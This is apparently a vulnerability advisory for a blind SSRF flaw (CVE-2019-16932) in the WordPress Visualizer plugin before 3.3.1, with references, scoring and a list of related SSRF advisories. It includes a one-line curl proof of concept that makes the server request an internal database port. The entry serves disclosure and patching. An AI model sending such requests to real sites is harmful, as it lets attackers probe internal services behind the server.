Visualizer < 3.3.1 – Blind Server-Side Request Forgery (SSRF) | CVE 2019-16932

Description

This plugin suffers from a blind SSRF vulnerability in the /wp-json/visualizer/v1/upload-data endpoint.

Proof of Concept

curl -i -s -X $'POST' \
    -H $'Host: 192.168.158.128:8000' \
    --data-binary $'{\"url\":\"http://db:3306\"}' \
    $'http://192.168.158.128:8000/wp-json/visualizer/v1/upload-data'

See the references for more details

Affects Plugins

visualizer

Fixed in 3.3.1

References

CVE

CVE-2019-16932

URL

https://nathandavison.com/blog/wordpress-visualizer-plugin-xss-and-ssrf

Classification

Type

SSRF

OWASP top 10

A1: Injection

CWE

CWE-918

CVSS

10.0 (critical)

Miscellaneous

Original Researcher

Nathan Davison

Submitter website

https://nathandavison.com

Submitter twitter

nj_dav

Verified

WPVDB ID

b7a932ea-9086-4615-9176-ee1043914040

Timeline

Publicly Published

2019-09-28 (about 6 years ago)

Added

2019-09-28 (about 6 years ago)

Last Updated

2020-09-22 (about 5 years ago)

Other

Published

Title

Published

2025-04-24

Title

WP AVCL Automation Helper (formerly WPFlyLeads) <= 3.4 - Authenticated (Subscriber+) Server-Side Request Forgery

Published

2024-04-22

Title

Culqi < 3.0.15 - Authenticated (Subscriber+) Server-Side Request Forgery

Published

2022-08-03

Title

MailChimp for Woocommerce < 2.7.1 - Subscriber+ SSRF

Published

2025-11-18

Title

Icon List Block – Add Icon-Based Lists with Custom Styles < 1.2.2 - Authenticated (Subscriber+) Server-Side Request Forgery

Published

2022-02-28

Title

Formcraft3 < 3.8.28 - Unauthenticated SSRF